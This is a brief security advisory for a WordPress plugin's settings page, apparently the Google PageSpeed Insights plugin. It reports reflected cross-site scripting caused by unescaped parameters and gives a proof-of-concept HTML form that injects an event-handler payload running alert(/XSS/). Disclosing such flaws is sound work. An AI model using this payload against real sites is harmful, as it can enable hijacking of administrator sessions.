The plugin does not sanitise and escape various parameters before outputting them back in attributes in the plugin’s settings dashboard, leading to Reflected Cross-Site Scripting
<html>
<form action="https://example.com/wp-admin/tools.php?page=google-pagespeed-insights&render=options" method="POST">
<input type="text" name="page" value='" style=animation-name:rotation onanimationstart=alert(/XSS/) x'>
<input type="submit" value="Send">
</form>
</html>